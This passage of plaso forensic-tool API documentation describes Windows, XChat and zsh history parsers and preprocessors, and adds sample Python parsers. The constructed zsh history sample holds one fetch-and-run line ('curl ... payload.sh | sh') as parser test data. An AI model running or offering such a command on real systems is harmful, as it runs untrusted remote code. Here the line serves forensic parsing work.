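Walking a real .evt file needs one more step than parse_evt_records shows: the file begins with a header record and ends with a floating end-of-file record, and a log that wrapped has its oldest record after the newest, so a production reader follows the header's start and end offsets rather than reading from byte 0. Records outside those offsets, and records that fail the checks above, are what plaso reports with recovered set to True.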

plaso.parsers.winfirewall module

Parser for Windows Firewall Log file.

class plaso.parsers.winfirewall.WinFirewallEventData
    Bases: plaso.containers.events.EventData

    Windows Firewall event data.

    action (str) – action taken.
    protocol (str) – IP protocol.
    source_ip (str) – source IP address.
    dest_ip (str) – destination IP address.
    source_port (int) – TCP or UDP source port.
    dest_port (int) – TCP or UDP destination port.
    size (int) – packet size in bytes.
    flags (str) – TCP flags.
    tcp_seq (int) – TCP sequence number.
    tcp_ack (int) – TCP acknowledgement number.
    tcp_win (int) – TCP window size in bytes.
    icmp_type (int) – ICMP type.
    icmp_code (int) – ICMP code.
    info (str) – informational entry whose meaning depends on the logged action.
    path (str) – direction of the packet: SEND, RECEIVE, FORWARD or UNKNOWN.

    DATA_TYPE = 'windows:firewall:log_entry'

class plaso.parsers.winfirewall.WinFirewallParser
    Bases: plaso.parsers.text_parser.PyparsingSingleLineTextParser

    Parses the Windows Firewall Log file.

    DATA_FORMAT = 'Windows Firewall log file'
    LINE_STRUCTURES = [('comment', {"#" SkipTo:(LineEnd)}), ('logline', {{{{{{{{{{{{{{{Group:({{{{{W:(0123...) Suppress:("-")} W:(0123...)} Suppress:("-")} W:(0123...)} {{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)}}) {{W:(ABCD...) | W:(ABCD...)} | Suppress:("-")}} {{W:(ABCD...) | W:(ABCD...)} | Suppress:("-")}} {{IPv4 address | IPv6 address} | Suppress:("-")}} {{IPv4 address | IPv6 address} | Suppress:("-")}} {W:(0123...) | Suppress:("-")}} {W:(0123...) | Suppress:("-")}} {W:(0123...) | Suppress:("-")}} {{W:(ABCD...) | W:(ABCD...)} | Suppress:("-")}} {W:(0123...) | Suppress:("-")}} {W:(0123...) | Suppress:("-")}} {W:(0123...) | Suppress:("-")}} {W:(0123...) | Suppress:("-")}} {W:(0123...) | Suppress:("-")}} {{W:(ABCD...) | W:(ABCD...)} | Suppress:("-")}} {{W:(ABCD...) | W:(ABCD...)} | Suppress:("-")}})]
    NAME = 'winfirewall'

    ParseRecord(parser_mediator, key, structure)
        Parses a log record structure and produces events.

        Parameters:
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • key (str) – identifier of the structure of tokens.
            • structure (pyparsing.ParseResults) – structure of tokens derived from a line of a text file.
        Raises: ParseError – when the structure type is unknown.

    VerifyStructure(parser_mediator, line)
        Verify that this file is a firewall log file.

        Parameters:
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • line (str) – line from a text file.
        Returns: True if the line is in the expected format, False if not.
        Return type: bool

plaso.parsers.winjob module

Parser for Windows Scheduled Task job files.

class plaso.parsers.winjob.WinJobEventData
    Bases: plaso.containers.events.EventData

    Windows Scheduled Task event data.

    application (str) – path to job executable.
    description (str) – description of the scheduled task.
    parameters (str) – application command line parameters.
    trigger_type (int) – trigger type.
    username (str) – username that scheduled the task.
    working_directory (str) – working directory of the scheduled task.

    DATA_TYPE = 'windows:tasks:job'

class plaso.parsers.winjob.WinJobParser
    Bases: plaso.parsers.interface.FileObjectParser, plaso.lib.dtfabric_helper.DtFabricHelper

    Parse Windows Scheduled Task files for job events.

    DATA_FORMAT = 'Windows Scheduled Task job (or at-job) file'
    NAME = 'winjob'

    ParseFileObject(parser_mediator, file_object)
        Parses a Windows job file-like object.

        Parameters:
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • file_object (dfvfs.FileIO) – a file-like object.
        Raises: UnableToParseFile – when the file cannot be parsed.

460 Chapter 5. plaso package Plaso (log2timeline), Release 20210606 plaso.parsers.winlnk module

Parser for Windows Shortcut (LNK) files. class plaso.parsers.winlnk.WinLnkLinkEventData Bases: plaso.containers.events.EventData Windows Shortcut (LNK) link event data. birth_droid_file_identifier distributed link tracking birth droid file identifier. Type str birth_droid_volume_identifier distributed link tracking birth droid volume identifier. Type str command_line_arguments command line arguments. Type str description description of the linked item. Type str drive_serial_number drive serial number where the linked item resides. Type int drive_type drive type where the linked item resided. Type str droid_file_identifier distributed link tracking droid file identifier. Type str droid_volume_identifier distributed link tracking droid volume identifier. Type str env_var_location environment variables loction. Type str file_attribute_flags file attribute flags of the linked item. Type int file_size size of the linked item. Type int icon_location icon location.


        Type: str
    link_target
        shell item list of the link target. Type: str
    local_path
        local path of the linked item. Type: str
    network_path
        network path of the linked item. Type: str
    relative_path
        relative path. Type: str
    volume_label
        volume label where the linked item resided. Type: str
    working_directory
        working directory. Type: str

    DATA_TYPE = 'windows:lnk:link'

class plaso.parsers.winlnk.WinLnkParser
    Bases: plaso.parsers.interface.FileObjectParser

    Parses Windows Shortcut (LNK) files.

    DATA_FORMAT = 'Windows Shortcut (LNK) file'
    NAME = 'lnk'

    classmethod GetFormatSpecification()
        Retrieves the format specification.
        Returns: format specification.
        Return type: FormatSpecification

    ParseFileLNKFile(parser_mediator, file_object, display_name)
        Parses a Windows Shortcut (LNK) file-like object.
        Parameters:
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • file_object (dfvfs.FileIO) – file-like object.
            • display_name (str) – display name.

    ParseFileObject(parser_mediator, file_object)
        Parses a Windows Shortcut (LNK) file-like object.
        Parameters:


            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • file_object (dfvfs.FileIO) – file-like object.

plaso.parsers.winprefetch module

Parser for Windows Prefetch files.

class plaso.parsers.winprefetch.WinPrefetchExecutionEventData
    Bases: plaso.containers.events.EventData

    Windows Prefetch event data.

    executable
        executable filename. Type: str
    format_version
        format version. Type: int
    mapped_files
        mapped filenames. Type: list[str]
    number_of_volumes
        number of volumes. Type: int
    path_hints
        possible full paths to the executable. Type: list[str]
    prefetch_hash
        prefetch hash. Type: int
    run_count
        run count. Type: int
    volume_device_paths
        volume device paths. Type: list[str]
    volume_serial_numbers
        volume serial numbers. Type: list[int]

    DATA_TYPE = 'windows:prefetch:execution'

class plaso.parsers.winprefetch.WinPrefetchParser
    Bases: plaso.parsers.interface.FileObjectParser

    A parser for Windows Prefetch files.


    DATA_FORMAT = 'Windows Prefetch File (PF)'
    NAME = 'prefetch'

    classmethod GetFormatSpecification()
        Retrieves the format specification.
        Returns: format specification.
        Return type: FormatSpecification

    ParseFileObject(parser_mediator, file_object)
        Parses a Windows Prefetch file-like object.
        Parameters:
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • file_object (dfvfs.FileIO) – file-like object.

plaso.parsers.winreg_parser module

Parser for Windows NT Registry (REGF) files.

class plaso.parsers.winreg_parser.WinRegistryParser
    Bases: plaso.parsers.interface.FileObjectParser

    Parses Windows NT Registry (REGF) files.

    DATA_FORMAT = 'Windows NT Registry (REGF) file'
    NAME = 'winreg'

    classmethod GetFormatSpecification()
        Retrieves the format specification.

    ParseFileObject(parser_mediator, file_object)
        Parses a Windows Registry file-like object.
        Parameters:
            • parser_mediator (ParserMediator) – parser mediator.
            • file_object (dfvfs.FileIO) – a file-like object.

plaso.parsers.winrestore module

Parser for Windows Restore Point (rp.log) files.

class plaso.parsers.winrestore.RestorePointEventData
    Bases: plaso.containers.events.EventData

    Windows Restore Point event data.

    description
        description. Type: str
    restore_point_event_type
        restore point event type. Type: str


    restore_point_type
        restore point type. Type: str
    sequence_number
        sequence number. Type: str

    DATA_TYPE = 'windows:restore_point:info'

class plaso.parsers.winrestore.RestorePointLogParser
    Bases: plaso.parsers.interface.FileObjectParser, plaso.lib.dtfabric_helper.DtFabricHelper

    A parser for Windows Restore Point (rp.log) files.

    DATA_FORMAT = 'Windows Restore Point log (rp.log) file'
    FILTERS = frozenset({})
    NAME = 'rplog'

    ParseFileObject(parser_mediator, file_object)
        Parses a Windows Restore Point (rp.log) log file-like object.
        Parameters:
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • file_object (dfvfs.FileIO) – file-like object.
        Raises: UnableToParseFile – when the file cannot be parsed.

plaso.parsers.xchatlog module

This file contains the XChat log file parser in plaso. Information updated 24 July 2013.

The parser applies to XChat log files. Despite their apparent simplicity, it is not straightforward to handle every possible case. XChat lets users specify how the timestamp is encoded (using the strftime function), including additional separators. This parser accepts only the simplest default English form of an XChat log file, as in the following (on message lines the sender's nickname appears between angle brackets before the text; the sample below does not show them):

    **** BEGIN LOGGING AT Mon Dec 31 21:11:55 2001

    dec 31 21:11:55 --> You are now talking on #gugle
    dec 31 21:11:55 --- Topic for #gugle is plaso, nobody knows what it means
    dec 31 21:11:55 Topic for #gugle set by Kristinn
    dec 31 21:11:55 --- Joachim gives voice to fpi
    dec 31 21:11:55 * XChat here
    dec 31 21:11:58 ola plas-ing guys!
    dec 31 21:12:00 ftw!

The case of log lines without month/day could also be handled, by taking the month and day from the header, but the parser logic would become intricate, since it would then have to track day transitions (chat lines crossing midnight). The same limitation is the origin of the last-day-of-the-year bug: the year is taken from the header, and the parser does not handle the transition from 31 December to 1 January, so lines written after midnight keep the old year.
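The following is an added example, standalone Python that is not plaso's XChatLogParser, showing the header-driven logic this module describes: a '**** BEGIN LOGGING AT' header supplies the year and switches parsing on, an END header switches it off, and any other '****' header is treated as an unknown language that stops parsing until the next English BEGIN. The sample log, its nicknames, channel and the non-English header are constructed for the example. Two details go beyond the page: it assumes XChat's closing header reads '**** ENDING LOGGING AT ...' (matched on the 'END' prefix), and it handles the year rollover the page calls the last-day-of-the-year bug by bumping the year when a line's month drops from December to January.

```python
import re
from datetime import datetime

# Constructed XChat log in the default English format (not plaso test data):
# nicknames, channel and the non-English header are invented for the example.
# Message lines carry the sender between angle brackets; status lines do not.
SAMPLE_LOG = """**** BEGIN LOGGING AT Mon Dec 31 23:59:50 2001

dec 31 23:59:55 -->\tYou are now talking on #gugle
dec 31 23:59:58 <alice>\thappy new year soon
jan 01 00:00:03 <bob>\tftw!
**** ENDING LOGGING AT Tue Jan 01 00:00:10 2002
**** INIZIO LOGGING AT Tue Jan 01 10:00:00 2002
jan 01 10:00:01 <carol>\tskipped: header in an unknown language
"""

MONTHS = {name: number for number, name in enumerate(
    ('jan', 'feb', 'mar', 'apr', 'may', 'jun',
     'jul', 'aug', 'sep', 'oct', 'nov', 'dec'), start=1)}

# "**** <ACTION> LOGGING AT <date>"; XChat writes BEGIN and ENDING (assumption).
HEADER = re.compile(r'^\*{4} (?P<action>\S+) LOGGING AT (?P<date>.+?)\s*$')
# "<mon> <day> <hh>:<mm>:<ss> [<nick>] <text>"; the year is not in the line.
LOG_LINE = re.compile(
    r'^(?P<mon>[A-Za-z]{3}) (?P<day>\d{1,2}) '
    r'(?P<hour>\d{2}):(?P<minute>\d{2}):(?P<second>\d{2})\s+'
    r'(?:<(?P<nick>[^>]+)>\s+)?(?P<text>.*)$')
HEADER_DATE_FORMAT = '%a %b %d %H:%M:%S %Y'  # English names: run under the C locale


def parse_xchat_log(text):
    """Returns a list of {'timestamp', 'nickname', 'text'} dicts (naive local time)."""
    events = []
    year = None       # taken from the most recent BEGIN header
    parsing = False   # only True between an English BEGIN header and an END header
    last = None       # previous timestamp, used to spot the Dec 31 -> Jan 1 rollover

    for line in text.splitlines():
        if line.startswith('****'):
            match = HEADER.match(line)
            header_time, action = None, ''
            if match:
                action = match.group('action')
                try:
                    header_time = datetime.strptime(match.group('date'), HEADER_DATE_FORMAT)
                except ValueError:
                    header_time = None   # date in another locale: treat as unknown
            if action == 'BEGIN' and header_time:
                year, parsing, last = header_time.year, True, header_time
                events.append({'timestamp': header_time, 'nickname': None,
                               'text': 'XChat start logging'})
            elif action.startswith('END') and header_time:
                parsing = False
                events.append({'timestamp': header_time, 'nickname': None,
                               'text': 'XChat end logging'})
            else:
                parsing = False   # header in another language: wait for the next BEGIN
            continue

        if not parsing:
            continue
        match = LOG_LINE.match(line)
        month = MONTHS.get(match.group('mon').lower()) if match else None
        if month is None:
            continue   # blank, continuation or malformed line
        if last is not None and last.month == 12 and month == 1:
            year += 1  # the log crossed into a new year; the header year is stale
        try:
            stamp = datetime(year, month, int(match.group('day')),
                             int(match.group('hour')), int(match.group('minute')),
                             int(match.group('second')))
        except ValueError:
            continue   # impossible date for this year (for example Feb 29)
        last = stamp
        events.append({'timestamp': stamp, 'nickname': match.group('nick'),
                       'text': match.group('text')})
    return events
```

The rollover check only fires on a December to January change, so a line that is merely out of order within a month does not move the year. Lines under the unknown-language header are dropped rather than guessed, which is the same choice the module makes.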


Moreover, strftime is locale-dependent, so month names, headers and footers can change, even inside the same log file. That said, the following is the main logic used to parse the log files (note that the first header must be '**** BEGIN ...', otherwise the file is skipped):

1) Check for '****'
   1.1) If 'BEGIN LOGGING AT' (English)
        1.1.1) Extract the YEAR
        1.1.2) Generate a new "start logging" event
        1.1.3) Set parsing = True
   1.2) If 'END LOGGING'
        1.2.1) If parsing, set parsing = False
        1.2.2) If not parsing, log debug
        1.2.3) Generate a new "end logging" event
   1.3) If neither BEGIN nor END, we are facing a different language and we do not know which one: if parsing is True, set parsing = False and log debug
2) Not '****', so we are parsing a line
   2.1) If parsing = True, try to parse the line and generate an event
   2.2) If parsing = False, skip until the next good header is found

References
    http://xchat.org

class plaso.parsers.xchatlog.XChatLogEventData
    Bases: plaso.containers.events.EventData

    XChat Log event data.

    nickname
        nickname. Type: str
    text
        text sent by nickname or other text (server, messages, etc.). Type: str

    DATA_TYPE = 'xchat:log:line'

class plaso.parsers.xchatlog.XChatLogParser
    Bases: plaso.parsers.text_parser.PyparsingSingleLineTextParser

    Parse XChat log files.

    DATA_FORMAT = 'XChat log file'
    LINE_STRUCTURES = [('logline', {{Group:({{W:(ABCD...) W:(0123...)} {{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)}}) [quoted string, starting with < ending with >]} SkipTo:(lineEnd)}), ('header', {{Suppress:("****") Group:({{W:(0123...) W:(0123...)} W:(0123...)})} Group:({{{{Group:({{{{{{"Sun" | "Mon"} | "Tue"} | "Wed"} | "Thu"} | "Fri"} | "Sat"}) W:(ABCD...)} W:(0123...)} {{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)}} W:(0123...)})}), ('header_signature', "****")]
    NAME = 'xchatlog'

    ParseRecord(parser_mediator, key, structure)
        Parses a log record structure and produces events.
        Parameters:
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • key (str) – identifier of the structure of tokens.
            • structure (pyparsing.ParseResults) – structure of tokens derived from a line of a text file.
        Raises: ParseError – when the structure type is unknown.

    VerifyStructure(parser_mediator, line)
        Verify that this file is a XChat log file.
        Parameters:


            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • line (str) – line from a text file.
        Returns: True if the line is in the expected format, False if not.
        Return type: bool

plaso.parsers.xchatscrollback module

This file contains the XChat scrollback log file parser in plaso. Information updated 06 September 2013.

Besides the logging capability, the XChat IRC client has the option to record the text for opened tabs. So, when rejoining a particular channel and/or a particular conversation, XChat will display the last messages exchanged. This artifact could be present, if not disabled, even if normal logging is disabled.

From the XChat FAQ (http://xchat.org/faq):

Q: 'How do I keep text from previous sessions from being displayed when I join a channel?'
R: 'Starting in XChat 2.8.4, XChat implemented the Scrollback feature which displays text from the last time you had a particular tab open. To disable this setting for all channels, Go to Settings -> Preferences -> Logging and uncheck Display scrollback from previous session. In XChat 2.8.6, XChat implemented both Per Channel Logging, and Per Channel Scrollbacks. If you are on 2.8.6 or newer, you can disable loading scrollback for just one particular tab name by right clicking on the tab name, selecting Settings, and then unchecking Reload scrollback'

The log file format differs from the logging format, but it is quite simple: each line is a literal 'T', a timestamp and the text, for example:

    T 1232315916 Python interface unloaded

The time reported in the log is the number of seconds since January 1, 1970 00:00:00 UTC (from the source code, time(0)). The text part could contain some 'decorators' (bold, underline, colors indication, etc.), so the parser should strip those control fields.

References
    http://xchat.org

class plaso.parsers.xchatscrollback.XChatScrollbackEventData
    Bases: plaso.containers.events.EventData

    XChat Scrollback line event data.

    nickname
        nickname. Type: str
    text
        text sent by nickname, or service messages. Type: str

    DATA_TYPE = 'xchat:scrollback:line'

class plaso.parsers.xchatscrollback.XChatScrollbackParser
    Bases: plaso.parsers.text_parser.PyparsingSingleLineTextParser

    Parses XChat scrollback log files.

    DATA_FORMAT = 'XChat scrollback log file'
    LINE_STRUCTURES = [('logline', {{Suppress:("T") W:(0123...)} SkipTo:(LineEnd)})]
    LOG_LINE = {{Suppress:("T") W:(0123...)} SkipTo:(LineEnd)}


    MSG_ENTRY = {[{{"<" SkipTo:(">")} ">"}] SkipTo:(LineEnd)}
    MSG_ENTRY_NICK = [{{"<" SkipTo:(">")} ">"}]
    MSG_ENTRY_TEXT = SkipTo:(LineEnd)
    MSG_NICK = SkipTo:(">")
    MSG_NICK_END = ">"
    MSG_NICK_START = "<"
    NAME = 'xchatscrollback'

    ParseRecord(parser_mediator, key, structure)
        Parses a log record structure.
        Parameters:
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • key (str) – name of the parsed structure.
            • structure (pyparsing.ParseResults) – structure parsed from the log file.

    STRIPPER = {Suppress:(W:(, 0123...)) | Suppress:(W:(...))}

    VerifyStructure(parser_mediator, line)
        Verify that this file is a XChat scrollback log file.
        Parameters:
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • line (str) – line from a text file.
        Returns: True if the line was successfully parsed, False if not.
        Return type: bool

plaso.parsers.zsh_extended_history module

Parser for ZSH extended_history files.

The file format is described here: http://zsh.sourceforge.net/Doc/Release/Options.html#index-EXTENDEDHISTORY

class plaso.parsers.zsh_extended_history.ZshExtendedHistoryParser
    Bases: plaso.parsers.text_parser.PyparsingMultiLineTextParser

    Parser for ZSH extended history files.

    DATA_FORMAT = 'ZSH extended history file'
    LINE_STRUCTURES = [('command', {{{{{{":" W:(0123...)} ":"} W:(0123...)} ";"} Re:('.+?(?=($|\\n:\\s\\d+:\\d+;))')} LineEnd})]
    NAME = 'zsh_extended_history'

    ParseRecord(parser_mediator, key, structure)
        Parses a record and produces a ZSH history event.
        Parameters:


            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • key (str) – name of the parsed structure.
            • structure (pyparsing.ParseResults) – structure parsed from the log file.
        Raises: ParseError – when the structure type is unknown.

    VerifyStructure(parser_mediator, lines)
        Verifies whether content corresponds to a ZSH extended_history file.
        Parameters:
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • lines (str) – one or more lines from the text file.
        Returns: True if the lines were successfully parsed, False if not.
        Return type: bool

class plaso.parsers.zsh_extended_history.ZshHistoryEventData
    Bases: plaso.containers.events.EventData

    ZSH history event data.

    command
        command that was run. Type: str
    elapsed_seconds
        number of seconds that the command took to execute. Type: int

    DATA_TYPE = 'shell:zsh:history'
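An added example, not plaso's ZshExtendedHistoryParser, of the record layout the LINE_STRUCTURES regex above encodes: each entry is ': <start epoch>:<elapsed seconds>;<command>', and the command is consumed lazily until the next record start or the end of the file, so a command that spans several lines is kept whole. The history content is constructed for the example; it assumes zsh stores an embedded newline in a multi-line command as a backslash followed by the newline, and the out_of_order check is a heuristic added here (several shells flushing history at exit can also produce it), not something the page describes.

```python
import re
from datetime import datetime, timezone

# Constructed zsh extended history content (not plaso test data). zsh writes
# ": <start epoch>:<elapsed seconds>;<command>" per entry; a multi-line command
# is stored with a backslash before each embedded newline (second entry).
SAMPLE_HISTORY = (
    ": 1457771210:0;cd /tmp\n"
    ": 1457771214:3;echo 'line one\\\nline two' | base64 -d\n"
    ": 1457771300:0;curl http://example.invalid/payload.sh | sh\n"
)

# Same shape as plaso's regex: the command is matched lazily until the next
# record start ("\n: <digits>:<digits>;") or the end of the data, so the
# embedded newline of a multi-line command stays inside the command.
_RECORD = re.compile(
    r'^: (?P<start>\d+):(?P<elapsed>\d+);(?P<command>.+?)(?=\n: \d+:\d+;|\n?\Z)',
    re.MULTILINE | re.DOTALL)


def parse_zsh_extended_history(data):
    """Returns one dict per history entry, in file order."""
    entries = []
    for match in _RECORD.finditer(data):
        start = int(match.group('start'))
        entries.append({
            # the start time is a Unix epoch, so it is unambiguous UTC
            'timestamp': datetime.fromtimestamp(start, tz=timezone.utc),
            'elapsed_seconds': int(match.group('elapsed')),
            'command': match.group('command'),
        })
    return entries


def out_of_order(entries):
    """Indexes of entries whose start time precedes the previous entry's.

    Heuristic only: a single shell appends in order, so a decrease usually
    means several shells wrote at exit or the file was edited."""
    return [index for index in range(1, len(entries))
            if entries[index]['timestamp'] < entries[index - 1]['timestamp']]
```

The trailing '\n?\Z' alternative matters: with '$' alone under MULTILINE the lazy match would stop at the first embedded newline and split the multi-line command into two entries.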

Module contents

This file imports Python modules that register parsers.

5.1.12 plaso.preprocessors package

Submodules

plaso.preprocessors.interface module

This file contains classes used for preprocessing in plaso.

class plaso.preprocessors.interface.ArtifactPreprocessorPlugin
    Bases: object

    The artifact preprocessor plugin interface. The artifact preprocessor determines preprocessing attributes based on an artifact definition defined by ARTIFACT_DEFINITION_NAME.

    ARTIFACT_DEFINITION_NAME = None


class plaso.preprocessors.interface.FileArtifactPreprocessorPlugin
    Bases: plaso.preprocessors.interface.FileEntryArtifactPreprocessorPlugin

    File artifact preprocessor plugin interface. Shared functionality for preprocessing attributes based on a file artifact definition, such as file or path.

class plaso.preprocessors.interface.FileEntryArtifactPreprocessorPlugin
    Bases: plaso.preprocessors.interface.FileSystemArtifactPreprocessorPlugin

    File entry artifact preprocessor plugin interface. Shared functionality for preprocessing attributes based on a file entry artifact definition, such as file or path.

class plaso.preprocessors.interface.FileSystemArtifactPreprocessorPlugin
    Bases: plaso.preprocessors.interface.ArtifactPreprocessorPlugin

    File system artifact preprocessor plugin interface. Shared functionality for preprocessing attributes based on a file system artifact definition, such as file or path.

    Collect(mediator, artifact_definition, searcher, file_system)
        Collects values using a file artifact definition.
        Parameters:
            • mediator (PreprocessMediator) – mediates interactions between preprocess plugins and other components, such as storage and knowledge base.
            • artifact_definition (artifacts.ArtifactDefinition) – artifact definition.
            • searcher (dfvfs.FileSystemSearcher) – file system searcher to preprocess the file system.
            • file_system (dfvfs.FileSystem) – file system to be preprocessed.
        Raises: PreProcessFail – if the preprocessing fails.

class plaso.preprocessors.interface.KnowledgeBasePreprocessorPlugin
    Bases: object

    The knowledge base preprocessor plugin interface. The knowledge base preprocessor determines preprocessing attributes based on other values in the knowledge base.

    abstract Collect(mediator)
        Collects values from the knowledge base.
        Parameters: mediator (PreprocessMediator) – mediates interactions between preprocess plugins and other components, such as storage and knowledge base.
        Raises: PreProcessFail – if the preprocessing fails.

class plaso.preprocessors.interface.WindowsRegistryKeyArtifactPreprocessorPlugin
    Bases: plaso.preprocessors.interface.ArtifactPreprocessorPlugin

    Windows Registry key artifact preprocessor plugin interface. Shared functionality for preprocessing attributes based on a Windows Registry artifact definition, such as Windows Registry key or value.

    Collect(mediator, artifact_definition, searcher)
        Collects values using a Windows Registry value artifact definition.
        Parameters:


            • mediator (PreprocessMediator) – mediates interactions between preprocess plugins and other components, such as storage and knowledge base.
            • artifact_definition (artifacts.ArtifactDefinition) – artifact definition.
            • searcher (dfwinreg.WinRegistrySearcher) – Windows Registry searcher to preprocess the Windows Registry.
        Raises: PreProcessFail – if the Windows Registry key or value cannot be read.

class plaso.preprocessors.interface.WindowsRegistryValueArtifactPreprocessorPlugin
    Bases: plaso.preprocessors.interface.WindowsRegistryKeyArtifactPreprocessorPlugin

    Windows Registry value artifact preprocessor plugin interface. Shared functionality for preprocessing attributes based on a Windows Registry value artifact definition.

plaso.preprocessors.linux module

This file contains preprocessors for Linux.

class plaso.preprocessors.linux.LinuxDistributionPlugin
    Bases: plaso.preprocessors.interface.FileArtifactPreprocessorPlugin
    The Linux distribution plugin.
    ARTIFACT_DEFINITION_NAME = 'LinuxDistributionRelease'

class plaso.preprocessors.linux.LinuxHostnamePlugin
    Bases: plaso.preprocessors.interface.FileArtifactPreprocessorPlugin
    The Linux hostname plugin.
    ARTIFACT_DEFINITION_NAME = 'LinuxHostnameFile'

class plaso.preprocessors.linux.LinuxIssueFilePlugin
    Bases: plaso.preprocessors.interface.FileArtifactPreprocessorPlugin
    The Linux issue file plugin.
    ARTIFACT_DEFINITION_NAME = 'LinuxIssueFile'

class plaso.preprocessors.linux.LinuxStandardBaseReleasePlugin
    Bases: plaso.preprocessors.interface.FileArtifactPreprocessorPlugin
    The Linux standard base (LSB) release plugin.
    ARTIFACT_DEFINITION_NAME = 'LinuxLSBRelease'

class plaso.preprocessors.linux.LinuxSystemdOperatingSystemPlugin
    Bases: plaso.preprocessors.interface.FileArtifactPreprocessorPlugin
    The Linux systemd operating system release plugin.
    ARTIFACT_DEFINITION_NAME = 'LinuxSystemdOSRelease'

class plaso.preprocessors.linux.LinuxTimeZonePlugin
    Bases: plaso.preprocessors.interface.FileEntryArtifactPreprocessorPlugin
    Linux time zone plugin.
    ARTIFACT_DEFINITION_NAME = 'LinuxLocalTime'

class plaso.preprocessors.linux.LinuxUserAccountsPlugin
    Bases: plaso.preprocessors.interface.FileArtifactPreprocessorPlugin
    The Linux user accounts plugin.
    ARTIFACT_DEFINITION_NAME = 'LinuxPasswdFile'

plaso.preprocessors.logger module

The preprocessors sub module logger.

plaso.preprocessors.macos module

This file contains preprocessors for MacOS.

class plaso.preprocessors.macos.MacOSHostnamePlugin
    Bases: plaso.preprocessors.macos.PlistFileArtifactPreprocessorPlugin
    MacOS hostname plugin.
    ARTIFACT_DEFINITION_NAME = 'MacOSSystemConfigurationPreferencesPlistFile'

class plaso.preprocessors.macos.MacOSKeyboardLayoutPlugin
    Bases: plaso.preprocessors.macos.PlistFileArtifactPreprocessorPlugin
    MacOS keyboard layout plugin.
    ARTIFACT_DEFINITION_NAME = 'MacOSKeyboardLayoutPlistFile'

class plaso.preprocessors.macos.MacOSSystemVersionPlugin
    Bases: plaso.preprocessors.macos.PlistFileArtifactPreprocessorPlugin
    MacOS system version information plugin.
    ARTIFACT_DEFINITION_NAME = 'MacOSSystemVersionPlistFile'

class plaso.preprocessors.macos.MacOSTimeZonePlugin
    Bases: plaso.preprocessors.interface.FileEntryArtifactPreprocessorPlugin
    MacOS time zone plugin.
    ARTIFACT_DEFINITION_NAME = 'MacOSLocalTime'

class plaso.preprocessors.macos.MacOSUserAccountsPlugin
    Bases: plaso.preprocessors.interface.FileEntryArtifactPreprocessorPlugin
    MacOS user accounts plugin.
    ARTIFACT_DEFINITION_NAME = 'MacOSUserPasswordHashesPlistFiles'

class plaso.preprocessors.macos.PlistFileArtifactPreprocessorPlugin
    Bases: plaso.preprocessors.interface.FileArtifactPreprocessorPlugin
    Plist file artifact preprocessor plugin interface. Retrieves values from a plist file artifact using names of keys defined in _PLIST_KEYS.

plaso.preprocessors.manager module

The preprocess plugins manager.

class plaso.preprocessors.manager.FileSystemWinRegistryFileReader(*args: Any, **kwargs: Any)
    Bases: dfwinreg.interface.

    A file system-based Windows Registry file reader.

    Open(path, ascii_codepage='cp1252')
        Opens the Windows Registry file specified by the path.
        Parameters:
            • path (str) – path of the Windows Registry file.
            • ascii_codepage (Optional[str]) – ASCII string codepage.
        Returns: Windows Registry file or None.
        Return type: WinRegistryFile

class plaso.preprocessors.manager.PreprocessPluginsManager
    Bases: object

    Preprocess plugins manager.

    classmethod CollectFromFileSystem(artifacts_registry, mediator, searcher, file_system)
        Collects values from the file system.
        Parameters:
            • artifacts_registry (artifacts.ArtifactDefinitionsRegistry) – artifacts definitions registry.
            • mediator (PreprocessMediator) – mediates interactions between preprocess plugins and other components, such as storage and knowledge base.
            • searcher (dfvfs.FileSystemSearcher) – file system searcher to preprocess the file system.
            • file_system (dfvfs.FileSystem) – file system to be preprocessed.

    classmethod CollectFromKnowledgeBase(mediator)
        Collects values from knowledge base values.
        Parameters: mediator (PreprocessMediator) – mediates interactions between preprocess plugins and other components, such as storage and knowledge base.

    classmethod CollectFromWindowsRegistry(artifacts_registry, mediator, searcher)
        Collects values from Windows Registry values.
        Parameters:
            • artifacts_registry (artifacts.ArtifactDefinitionsRegistry) – artifacts definitions registry.
            • mediator (PreprocessMediator) – mediates interactions between preprocess plugins and other components, such as storage and knowledge base.
            • searcher (dfwinreg.WinRegistrySearcher) – Windows Registry searcher to preprocess the Windows Registry.

    classmethod DeregisterPlugin(plugin_class)
        Deregisters a preprocess plugin class.


        Parameters: plugin_class (type) – preprocess plugin class.
        Raises:
            • KeyError – if plugin class is not set for the corresponding name.
            • TypeError – if the source type of the plugin class is not supported.

    classmethod GetNames()
        Retrieves the names of the registered artifact definitions.
        Returns: registered artifact definitions names.
        Return type: list[str]

    classmethod RegisterPlugin(plugin_class)
        Registers a preprocess plugin class.
        Parameters: plugin_class (type) – preprocess plugin class.
        Raises:
            • KeyError – if plugin class is already set for the corresponding name.
            • TypeError – if the source type of the plugin class is not supported.

    classmethod RegisterPlugins(plugin_classes)
        Registers preprocess plugin classes.
        Parameters: plugin_classes (list[type]) – preprocess plugin classes.
        Raises: KeyError – if plugin class is already set for the corresponding name.

    classmethod RunPlugins(artifacts_registry, file_system, mount_point, mediator)
        Runs the preprocessing plugins.
        Parameters:
            • artifacts_registry (artifacts.ArtifactDefinitionsRegistry) – artifacts definitions registry.
            • file_system (dfvfs.FileSystem) – file system to be preprocessed.
            • mount_point (dfvfs.PathSpec) – mount point path specification that refers to the base location of the file system.
